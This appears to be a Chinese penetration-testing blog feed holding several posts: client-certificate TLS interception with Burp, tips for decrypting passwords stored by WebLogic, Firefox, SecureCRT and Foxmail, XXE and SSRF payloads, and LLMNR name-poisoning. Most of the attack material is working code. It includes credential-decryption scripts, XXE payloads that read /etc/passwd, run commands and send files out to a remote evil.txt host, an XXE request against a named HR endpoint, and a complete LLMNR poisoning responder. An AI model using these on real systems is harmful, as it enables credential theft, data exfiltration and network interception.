<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><Connector port="8443" protocol="org.apache.coyote.http11.Http11Protocol"</div><div class="line"> maxThreads="150" SSLEnabled="true" scheme="https" secure="true"</div><div class="line"> clientAuth="true" sslProtocol="TLS"</div><div class="line"> keystoreFile="${catalina.base}\conf\server.keystore" keystorePass="123456" </div><div class="line"> truststoreFile="${catalina.base}\conf\server.keystore" truststorePass="123456" /></div></pre></td></tr></table></figure>
<p>由于没有客户端证书,浏览器访问将被拒绝。</p>
<p><img src="https://i.imgur.com/X0cRtx6.png" alt=""></p>
<h3 id="安卓客户端"><a href="#安卓客户端" class="headerlink" title="安卓客户端"></a>安卓客户端</h3><!-- code -->
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div></pre></td><td class="code"><pre><div class="line">try {</div><div class="line"> // 服务器端需要验证的客户端证书,其实就是客户端的keystore</div><div class="line"> KeyStore keyStore = KeyStore.getInstance("BKS");</div><div class="line"> // 客户端信任的服务器端证书</div><div class="line"> KeyStore trustStore = KeyStore.getInstance("BKS");</div><div class="line"></div><div class="line"> //读取证书</div><div class="line"> InputStream ksIn = getResources().getAssets().open("client.bks");</div><div class="line"> InputStream tsIn = getResources().getAssets().open("truststore.bks");</div><div class="line"></div><div class="line"> //加载证书</div><div class="line"> keyStore.load(ksIn,"123456".toCharArray());</div><div class="line"> trustStore.load(tsIn,"123456".toCharArray());</div><div class="line"> IOUtils.close(ksIn);</div><div class="line"> IOUtils.close(tsIn);</div><div class="line"></div><div class="line"> //初始化SSLContext</div><div class="line"> SSLContext sslContext = SSLContext.getInstance("TLS");</div><div class="line"> TrustManagerFactory trustManagerFactory = TrustManagerFactory.getInstance("X509");</div><div class="line"> KeyManagerFactory keyManagerFactory = KeyManagerFactory.getInstance("X509");</div><div class="line"> trustManagerFactory.init(trustStore);</div><div class="line"> keyManagerFactory.init(keyStore, "123456".toCharArray());</div><div class="line"> sslContext.init(keyManagerFactory.getKeyManagers(), trustManagerFactory.getTrustManagers(), null);</div><div class="line"></div><div class="line"> //通过HttpsURLConnection设置链接</div><div class="line"> SSLSocketFactory socketFactory = sslContext.getSocketFactory();</div><div class="line"> HttpsURLConnection.setDefaultSSLSocketFactory(socketFactory);</div><div class="line"></div><div class="line"> URL url = new URL(url);</div><div class="line"> HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();</div><div class="line"> //设置ip授权认证:如果已经安装该证书,可以不设置,否则需要设置</div><div class="line"> conn.setHostnameVerifier(new HostnameVerifier() {</div><div class="line"> @Override</div><div class="line"> public boolean verify(String hostname, SSLSession session) {</div><div class="line"> return true;</div><div class="line"> }</div><div class="line"> });</div><div class="line"> InputStream inputStream = conn.getInputStream();</div><div class="line"> String content = getString(inputStream);</div><div class="line"> IOUtils.close(inputStream);</div><div class="line"> System.out.println(content);</div><div class="line"></div><div class="line">} catch (Exception e) {</div><div class="line"> e.printStackTrace();</div><div class="line">}</div></pre></td></tr></table></figure>
<h2 id="Burp-代理"><a href="#Burp-代理" class="headerlink" title="Burp 代理"></a>Burp 代理</h2><p>提取app中的客户端证书,在Burp的Project options -> SSL选项卡Client SSL Certificates栏处导入,之后Burp便可直接访问目标站点。</p>
<p><img src="https://i.imgur.com/CHvcAzX.png" alt=""></p>
<p>app客户端依旧使用Xposed JustTrustMe插件绕过服务器证书校验。</p>
]]></content>
</entry>
<entry>
<title><![CDATA[Password Crack Tips]]></title>
<url>/2018/05/11/Password-Crack-Tips/</url>
<content type="html"><![CDATA[<h1 id="常用软件密码解密"><a href="#常用软件密码解密" class="headerlink" title="常用软件密码解密"></a>常用软件密码解密</h1><h2 id="Weblogic"><a href="#Weblogic" class="headerlink" title="Weblogic"></a>Weblogic</h2><ol>
<li>登陆密码</li>
<li>数据库配置文件(Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml)</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">import</span> weblogic.security.internal.*;</div><div class="line"><span class="keyword">import</span> weblogic.security.internal.encryption.*;</div><div class="line"></div><div class="line"><span class="comment">/**</span></div><div class="line"><span class="comment">*</span></div><div class="line"><span class="comment">* 密码文件 Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties</span></div><div class="line"><span class="comment">* 密钥文件 Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat</span></div><div class="line"><span class="comment">*/</span></div><div class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">WebLogicDecryptor</span> </span>{</div><div class="line"> <span class="keyword">private</span> <span class="keyword">static</span> ClearOrEncryptedService ces;</div><div class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</div><div class="line"> <span class="keyword">if</span> (args.length < <span class="number">1</span>) {</div><div class="line"> <span class="keyword">throw</span> <span class="keyword">new</span> Exception(<span class="string">"must set [domainDir] [encryptStr]"</span>);</div><div class="line"> }</div><div class="line"> ces = <span class="keyword">new</span> ClearOrEncryptedService(</div><div class="line"> SerializedSystemIni.getEncryptionService(args[<span class="number">0</span>])); <span class="comment">// your_domain</span></div><div class="line"> System.out.println(<span class="string">"Decrypted: "</span> + ces.decrypt(args[<span class="number">1</span>])); <span class="comment">// {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8= 12id9*@YNs0_q2dxwe</span></div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>
<a id="more"></a>
<ol>
<li>设置环境变量<br><code>base_domain\bin\setDomainEnv.cmd</code></li>
<li>编译<br><code>javac WebLogicDecryptor.java</code></li>
<li>运行<br><code>java WebLogicDecryptor D:\Server\Oracle\Middleware\user_projects\domains\base_domain {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8=</code></li>
</ol>
<p><a href="https://github.com/NetSPI/WebLogicPasswordDecryptor" target="_blank" rel="external">https://github.com/NetSPI/WebLogicPasswordDecryptor</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">javac -classpath bcprov-jdk15on-1.58.jar WebLogicPasswordDecryptor.java</div><div class="line">java -Djava.ext.dirs=. WebLogicPasswordDecryptor "./SerializedSystemIni.dat" "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="</div></pre></td></tr></table></figure></p>
<p>补丁安装<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">./bsu.cmd -prod_dir=c:\Oracle\Middleware\wlserver_10.3 -status=applied -verbose -view</div><div class="line">./bsu.sh -view -status=downloaded -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir</div><div class="line">./bsu.sh -install -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patchlist=GFWX -verbose</div></pre></td></tr></table></figure></p>
<h2 id="Firefox"><a href="#Firefox" class="headerlink" title="Firefox"></a>Firefox</h2><p>nss3.dll路径<br>C:\Program Files (x86)\Mozilla Firefox\nss3.dll</p>
<p>火狐Profiles地址<br>C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zvu7t3k2.default<br>cert8.db<br>key3.db<br>logins.json</p>
<p><code>ff_decrypt.py profilesfolder</code></p>
<h2 id="SecureCRT"><a href="#SecureCRT" class="headerlink" title="SecureCRT"></a>SecureCRT</h2><p><a href="https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py" target="_blank" rel="external">https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> Blowfish</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">decrypt</span><span class="params">(password)</span> :</span></div><div class="line"> c1 = Blowfish.new(<span class="string">'5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'</span>.replace(<span class="string">' '</span>,<span class="string">''</span>).decode(<span class="string">'hex'</span>), Blowfish.MODE_CBC, <span class="string">'\x00'</span>*<span class="number">8</span>)</div><div class="line"> c2 = Blowfish.new(<span class="string">'24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'</span>.replace(<span class="string">' '</span>,<span class="string">''</span>).decode(<span class="string">'hex'</span>), Blowfish.MODE_CBC, <span class="string">'\x00'</span>*<span class="number">8</span>)</div><div class="line"> padded = c1.decrypt(c2.decrypt(password.decode(<span class="string">'hex'</span>))[<span class="number">4</span>:<span class="number">-4</span>])</div><div class="line"> p = <span class="string">''</span></div><div class="line"> <span class="keyword">while</span> padded[:<span class="number">2</span>] != <span class="string">'\x00\x00'</span> :</div><div class="line"> p += padded[:<span class="number">2</span>]</div><div class="line"> padded = padded[<span class="number">2</span>:]</div><div class="line"> <span class="keyword">return</span> p.decode(<span class="string">'UTF-16'</span>)</div><div class="line"></div><div class="line"><span class="keyword">print</span> decrypt(<span class="string">"xxx240f919a7a477198d1f6ce3a1fbf5a3671c82483f34bed1304c7ebe8de345"</span>);</div></pre></td></tr></table></figure>
<h2 id="Foxmail"><a href="#Foxmail" class="headerlink" title="Foxmail"></a>Foxmail</h2><p>版本小于 7.0 Foxmail\Storage\test@domain.com\Accounts\Account.stg<br>版本大于 7.0 Account.cfg</p>
<ol>
<li>Account.stg 文件可用工具破解。</li>
<li>Account.cfg 格式的将Account目录复制到同版本Storage目录下,修改FMStorage.list文件添加新邮箱 Storage\test@domain.com\,启动客户端用星号密码查看器查看密码。</li>
</ol>
<h2 id="Outlook"><a href="#Outlook" class="headerlink" title="Outlook"></a>Outlook</h2>]]></content>
</entry>
<entry>
<title><![CDATA[XXE]]></title>
<url>/2018/05/11/XXE/</url>
<content type="html"><![CDATA[<h1 id="XML-Injection"><a href="#XML-Injection" class="headerlink" title="XML Injection"></a>XML Injection</h1><h2 id="XML-External-Entity-XXE-Processing"><a href="#XML-External-Entity-XXE-Processing" class="headerlink" title="XML External Entity (XXE) Processing"></a>XML External Entity (XXE) Processing</h2><p>访问本地资源</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span></div><div class="line">$xml=<span class="string"><<<XML</span></div><div class="line"><span class="string"><?xml version="1.0" encoding="ISO-8859-1"?></span></div><div class="line"><span class="string"><!DOCTYPE foo [ </span></div><div class="line"><span class="string"> <!ELEMENT foo ANY ></span></div><div class="line"><span class="string"> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo></span></div><div class="line"><span class="string">XML;</span></div><div class="line">$data = simplexml_load_string($xml);</div><div class="line">print_r($data);</div><div class="line"><span class="meta">?></span></div></pre></td></tr></table></figure>
<p>远程代码执行,需要php开启expect</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta"><?</span>xml version=<span class="string">"1.0"</span> encoding=<span class="string">"ISO-8859-1"</span><span class="meta">?></span></span></div><div class="line"><span class="meta"><!DOCTYPE foo [ </span></div><div class="line"><span class="meta"> <!ELEMENT foo ANY ></span></div><div class="line"><span class="meta"> <!ENTITY xxe SYSTEM "expect://id" >]></span></div><div class="line"><span class="tag"><<span class="name">creds</span>></span></div><div class="line"> <span class="tag"><<span class="name">user</span>></span>&xxe;<span class="tag"></<span class="name">user</span>></span></div><div class="line"> <span class="tag"><<span class="name">pass</span>></span>mypass<span class="tag"></<span class="name">pass</span>></span></div><div class="line"><span class="tag"></<span class="name">creds</span>></span></div></pre></td></tr></table></figure>
<a id="more"></a>
<p>检测内网</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0" ?></div><div class="line"><!DOCTYPE ANY [</div><div class="line"> <!ENTITY xxe SYSTEM "http://192.168.1.2:8080/data" >]><foo>&xxe;</foo></div></pre></td></tr></table></figure>
<p>Tag Injection<br>内容注入</p>
<h4 id="Blind-XXE"><a href="#Blind-XXE" class="headerlink" title="Blind XXE"></a>Blind XXE</h4><p>嵌套远程实体</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0"?> </div><div class="line"><!DOCTYPE ANY[ </div><div class="line"><!ENTITY % file SYSTEM "file:///C:/1.txt"> </div><div class="line"><!ENTITY % remote SYSTEM "http://192.168.150.1/evil.txt"> </div><div class="line">%remote; </div><div class="line">%all; </div><div class="line">%send; </div><div class="line">]></div></pre></td></tr></table></figure>
<p>evil.txt<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.150.1/1.php?file=%file;'>"></div></pre></td></tr></table></figure></p>
<h3 id="Testing-for-XML-Injection"><a href="#Testing-for-XML-Injection" class="headerlink" title="Testing for XML Injection"></a>Testing for XML Injection</h3><p>打破xml格式使其报错</p>
<p>If ‘&’ is not encoded itself with &, it could be used to test XML injection. </p>
<p><a href="https://github.com/xmendez/wfuzz/" target="_blank" rel="external">https://github.com/xmendez/wfuzz/</a></p>
<h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">POST /hrss/dorado/smartweb2.RPC.d?__rpc=true</div><div class="line"></div><div class="line">__type=updateData&__viewInstanceId=dorado.tabselfservice.FindBackStaticPWSvNewForReset~dorado.common.BaseViewModel&__xml=<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:////test" >]><foo>&xxe;</foo>&1518403736067</div></pre></td></tr></table></figure>
<p>回显Payload<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><!DOCTYPE ANY[</span></div><div class="line"><span class="meta"><!ENTITY xxe SYSTEM "/">]></span></div><div class="line"><span class="tag"><<span class="name">rpc</span> <span class="attr">method</span>=<span class="string">"noteInputCount"</span>></span></div><div class="line"> <span class="tag"><<span class="name">ps</span>></span></div><div class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">name</span>=<span class="string">"user_code"</span>></span>1<span class="tag"></<span class="name">p</span>></span></div><div class="line"> <span class="tag"></<span class="name">ps</span>></span></div><div class="line"> <span class="tag"><<span class="name">vps</span>></span></div><div class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">name</span>=<span class="string">"DEFAULT_DATA_SOURCE"</span>></span>%26xxe;<span class="tag"></<span class="name">p</span>></span></div><div class="line"> <span class="tag"></<span class="name">vps</span>></span></div><div class="line"><span class="tag"></<span class="name">rpc</span>></span></div></pre></td></tr></table></figure></p>
<h2 id="SSRF-Server-Side-Request-Forgery"><a href="#SSRF-Server-Side-Request-Forgery" class="headerlink" title="SSRF (Server-Side Request Forgery)"></a>SSRF (Server-Side Request Forgery)</h2><p>内网端口探测</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span></div><div class="line"><span class="comment">//端口探测</span></div><div class="line"><span class="keyword">if</span>(!$fp = fsockopen($host, intval($port), $errno, $errstr, <span class="number">5</span>)){</div><div class="line"> <span class="keyword">echo</span> <span class="string">"$errno $errstr\n"</span>;</div><div class="line">}</div><div class="line"><span class="keyword">else</span>{</div><div class="line"> <span class="keyword">echo</span> <span class="string">"Port open.\n"</span>;</div><div class="line"> <span class="keyword">if</span>($fp){</div><div class="line"> fclose($fp);</div><div class="line"> }</div><div class="line">}</div><div class="line"><span class="meta">?></span></div></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span></div><div class="line"><span class="comment">//访问网页</span></div><div class="line">$ch = curl_init();</div><div class="line">curl_setopt($ch, CURLOPT_URL, <span class="string">"http://www.example.com/"</span>);</div><div class="line">curl_setopt($ch, CURLOPT_HEADER, <span class="number">0</span>);</div><div class="line"><span class="keyword">echo</span> curl_exec($ch);</div><div class="line">curl_close($ch);</div><div class="line"><span class="meta">?></span></div></pre></td></tr></table></figure>
<h2 id="XPath-injection"><a href="#XPath-injection" class="headerlink" title="XPath injection"></a>XPath injection</h2><p>XPath 使用路径表达式来选取 XML 文档中的节点或节点集。</p>
]]></content>
</entry>
<entry>
<title><![CDATA[名称欺骗中间人攻击]]></title>
<url>/2017/12/14/%E5%90%8D%E7%A7%B0%E6%AC%BA%E9%AA%97%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB/</url>
<content type="html"><![CDATA[<h1 id="名称欺骗中间人攻击"><a href="#名称欺骗中间人攻击" class="headerlink" title="名称欺骗中间人攻击"></a>名称欺骗中间人攻击</h1><h3 id="LLMNR"><a href="#LLMNR" class="headerlink" title="LLMNR"></a>LLMNR</h3><p>Link-Local Multicast Name Resolution (LLMNR)<br>链路本地多播名称解析</p>
<p>当我们执行<code>ping WEBTST01</code>将会发送LLMNR请求解析WEBTST01。所有的LLMNR包将会发送到组播地址224.0.0.252 MAC:<code>01:00:5E:00:00:FC</code>,响应主机将单播回应查询。</p>
<p><img src="https://i.imgur.com/o1jbyP5.png" alt=""></p>
<h4 id="LLMNR-packet-header-structure"><a href="#LLMNR-packet-header-structure" class="headerlink" title="LLMNR packet header structure"></a>LLMNR packet header structure</h4><p><img src="https://i.imgur.com/VHUoWeu.png" alt=""></p>
<ul>
<li>ID - A 16-bit identifier assigned by the program that generates any kind of query.</li>
<li>QR - Query/Response.</li>
<li>OPCODE - A 4-bit field that specifies the kind of query in this message. This value is set by the originator of a query and copied * into the response. This specification defines the behavior of standard queries and responses (opcode value of zero). Future specifications may define the use of other opcodes with LLMNR.</li>
<li>C - Conflict.</li>
<li>TC - TrunCation.</li>
<li>T - Tentative.</li>
<li>Z - Reserved for future use.</li>
<li>RCODE - Response code.</li>
<li>QDCOUNT - An unsigned 16-bit integer specifying the number of entries in the question section.</li>
<li>ANCOUNT - An unsigned 16-bit integer specifying the number of resource records in the answer section.</li>
<li>NSCOUNT - An unsigned 16-bit integer specifying the number of name server resource records in the authority records section.</li>
<li>ARCOUNT - An unsigned 16-bit integer specifying the number of resource records in the additional records section.</li>
</ul>
<a id="more"></a>
<h4 id="LLMNR-Poison"><a href="#LLMNR-Poison" class="headerlink" title="LLMNR Poison"></a>LLMNR Poison</h4><p>基于名字解析的ip欺骗</p>
<p>Python模拟LLMNR响应Demo<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div class="line">74</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!python</span></div><div class="line"><span class="comment">#/usr/bin/env python</span></div><div class="line"></div><div class="line">__doc__ = <span class="string">"""</span></div><div class="line"><span class="string"> LLMNR Answer, by Her0in</span></div><div class="line"><span class="string">"""</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> socket, struct</div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">LLMNR_Answer</span>:</span></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, addr)</span>:</span></div><div class="line"></div><div class="line"> self.IPADDR = addr</div><div class="line"> self.las = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</div><div class="line"> self.init_socket()</div><div class="line"> self.populate()</div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">populate</span><span class="params">(self)</span>:</span></div><div class="line"></div><div class="line"> self.AnswerData = (</div><div class="line"> <span class="string">"TID"</span> <span class="comment"># Tid</span></div><div class="line"> <span class="string">"\x80\x00"</span> <span class="comment"># Flags Query(0x0000)? or Response(0x8000) ?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Question</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Answer RRS</span></div><div class="line"> <span class="string">"\x00\x00"</span> <span class="comment"># Authority RRS</span></div><div class="line"> <span class="string">"\x00\x00"</span> <span class="comment"># Additional RRS</span></div><div class="line"> <span class="string">"LENGTH"</span> <span class="comment"># Question Name Length</span></div><div class="line"> <span class="string">"NAME"</span> <span class="comment"># Question Name</span></div><div class="line"> <span class="string">"\x00"</span> <span class="comment"># Question Name Null</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Query Type ,IPv4(0x0001)? or IPv6(0x001c)?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Class</span></div><div class="line"> <span class="string">"LENGTH"</span> <span class="comment"># Answer Name Length</span></div><div class="line"> <span class="string">"NAME"</span> <span class="comment"># Answer Name</span></div><div class="line"> <span class="string">"\x00"</span> <span class="comment"># Answer Name Null</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Answer Type ,IPv4(0x0001)? or IPv6(0x001c)?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Class</span></div><div class="line"> <span class="string">"\x00\x00\x00\x1e"</span> <span class="comment"># TTL Default:30s</span></div><div class="line"> <span class="string">"\x00\x04"</span> <span class="comment"># IP Length</span></div><div class="line"> <span class="string">"IPADDR"</span>) <span class="comment"># IP Address</span></div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">init_socket</span><span class="params">(self)</span>:</span></div><div class="line"> self.HOST = <span class="string">"192.168.15.165"</span></div><div class="line"> self.PORT = <span class="number">5355</span></div><div class="line"> self.MulADDR = <span class="string">"224.0.0.252"</span></div><div class="line"> self.las.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="number">1</span>)</div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, <span class="number">255</span>)</div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,</div><div class="line"> socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))</div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">Answser</span><span class="params">(self)</span>:</span></div><div class="line"> self.las.bind((self.HOST, self.PORT))</div><div class="line"> <span class="keyword">print</span> <span class="string">"Listening..."</span></div><div class="line"> <span class="keyword">while</span> <span class="keyword">True</span>:</div><div class="line"> data, addr = self.las.recvfrom(<span class="number">1024</span>)</div><div class="line"></div><div class="line"> tid = data[<span class="number">0</span>:<span class="number">2</span>]</div><div class="line"> namelen = struct.unpack(<span class="string">'>B'</span>, data[<span class="number">12</span>])[<span class="number">0</span>]</div><div class="line"> name = data[<span class="number">13</span>:<span class="number">13</span> + namelen]</div><div class="line"></div><div class="line"> data = self.AnswerData.replace(<span class="string">'TID'</span>, tid)</div><div class="line"> data = data.replace(<span class="string">'LENGTH'</span>, struct.pack(<span class="string">'>B'</span>, namelen))</div><div class="line"> data = data.replace(<span class="string">'NAME'</span>, name)</div><div class="line"> data = data.replace(<span class="string">'IPADDR'</span>, socket.inet_aton(self.IPADDR))</div><div class="line"></div><div class="line"> <span class="keyword">print</span> <span class="string">"Poisoned answer(%s) sent to %s for name %s "</span> % (self.IPADDR, addr[<span class="number">0</span>], name)</div><div class="line"> self.las.sendto(data, addr)</div><div class="line"></div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP,</div><div class="line"> socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))</div><div class="line"> self.las.close()</div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</div><div class="line"> llmnr = LLMNR_Answer(<span class="string">"11.22.33.44"</span>)</div><div class="line"> llmnr.Answser()</div></pre></td></tr></table></figure></p>
<h3 id="Network-Basic-Input-Output-System-NetBIOS"><a href="#Network-Basic-Input-Output-System-NetBIOS" class="headerlink" title="Network Basic Input/Output System (NetBIOS)"></a>Network Basic Input/Output System (NetBIOS)</h3><p>NetBIOS is an API providing various networking services.</p>
<p>NetBIOS provides three distinct services:</p>
<ul>
<li>Name service for name registration and resolution (ports: 137/udp and 137/tcp)</li>
<li>Datagram distribution service for connectionless communication (port: 138/udp)</li>
<li>Session service for connection-oriented communication (port: 139/tcp)</li>
</ul>
<h4 id="NBNS"><a href="#NBNS" class="headerlink" title="NBNS"></a>NBNS</h4><p>NetBIOS名字服务,将NetBIOS名称解析为相应IP地址。很多时候是启用TCP/IP上的NetBIOS。</p>
<p><img src="https://i.imgur.com/eA7fXEE.png" alt=""></p>
<p>当我们PING hostname或者socket.gethostbyname(‘hostname’)时,依次会在本地缓存查找,LMHOSTS,WINS服务器,广播“名称查询”数据包。</p>
<p><img src="https://i.imgur.com/rjQSub1.png" alt=""></p>
<h4 id="Nbtstat"><a href="#Nbtstat" class="headerlink" title="Nbtstat"></a>Nbtstat</h4><p>我们可以通过nbtstat命令来查看本地NetBIOS名称缓存。</p>
